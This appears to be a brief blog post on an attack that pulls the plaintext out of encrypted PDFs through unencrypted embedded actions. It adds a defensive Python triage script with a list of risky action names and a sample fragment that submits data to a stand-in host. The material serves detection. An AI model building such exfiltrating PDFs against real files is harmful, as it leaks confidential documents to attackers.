Attack on encrypted PDFs exfiltrates clear text data

Here’s a quite clever hack…

German security researchers have found a way to exfiltrate the contents of encrypted PDF files without breaking their encryption.

The PDF file format allows different parts of the same file to be either encrypted or unencrypted. It is therefore possible to modify an unreadable encrypted file by adding some (clear text) code that sends the decrypted contents of the file to an Internet destination when the authorized user of the file enters the password and views the file. In some cases, no user interaction is required for the attack to trigger. Pretty nifty.

The PDF viewers that you and your coworkers are most likely to use are vulnerable to this kind of attack and it seems like this would be difficult to fix, since it takes advantage of a feature rather than a bug. It will be interesting to see how this plays out and whether real attackers take advantage of it.
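The mix of encrypted and clear text parts described above suggests a triage check for defenders: flag encrypted PDFs that also carry readable action names or URLs. The Python below is an added example, not code from the researchers or from this post; the list of action names, the sample fragments and the host `collector.example` are assumptions constructed for illustration.

```python
import re

# Assumed list of action types that can make a viewer contact a remote host,
# open another file or run script. PDF encryption covers strings and streams,
# not names, so these stay readable in the raw bytes of an encrypted file.
ACTION_NAMES = (b"SubmitForm", b"URI", b"JavaScript", b"Launch", b"GoToR",
                b"ImportData")
URL_RE = re.compile(rb"https?://[^\s()<>]+")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx name escapes so /Submit#46orm is matched as /SubmitForm."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Heuristic: is this an encrypted PDF that also has clear text actions?"""
    data = normalize_names(data)
    encrypted = re.search(rb"/Encrypt(?![A-Za-z])", data) is not None
    actions = sorted({n.decode() for n in ACTION_NAMES
                      if re.search(rb"/" + n + rb"(?![A-Za-z])", data)})
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(data)})
    return {
        "encrypted": encrypted,
        "actions": actions,
        # Strings are normally encrypted, so a readable URL stands out.
        "cleartext_urls": urls,
        "needs_review": encrypted and bool(actions or urls),
    }


# Constructed fragments (not complete PDFs) used as sample input.
PLAIN_ENCRYPTED = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                   b"trailer << /Root 1 0 R /Encrypt 9 0 R >>\n")
MODIFIED = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
            b"5 0 obj << /S /Submit#46orm /F (http://collector.example/x) >> endobj\n"
            b"trailer << /Root 1 0 R /Encrypt 9 0 R >>\n")

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_ENCRYPTED), ("modified", MODIFIED)):
        print(label, triage_pdf(sample))
```

Legitimate encrypted documents with links or forms will also be flagged because action names are never encrypted; a readable URL is the stronger signal. Objects packed into object streams are not visible to a raw byte scan like this one.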

